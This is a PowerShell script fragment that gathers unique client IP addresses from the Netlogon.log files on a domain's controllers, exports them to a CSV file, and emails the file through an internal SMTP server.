$DomainControllers=GetDomainControllers
$allIPs=@()
#Get the Netlogon.log from each DC
Foreach ($DomainController in $DomainControllers) {
$IPsFromDC=GetNetLogonFile($DomainController)
$allIPs+=$IPsFromDC
}
#Only get the unique IPs and dump it to a CSV file
$allIPs | Sort-Object -Property IPaddress -Unique | Export-Csv "C:\NetlogonIPs.csv"
#Set up mail variables
$from="me@here"
$to="me@here"
$subject="IP addresses in Netlogon.log file from the last month"
$attach="C:\NetlogonIPs.csv"
$body="File containing all unique IPs listed in the netlogon.log file for all the Domain Controllers in the company domain."
#Send mail message
Send-MailMessage -from $from -To $to -subject $subject -SmtpServer smtpserver -Body $body -BodyAsHtml -Attachments $attach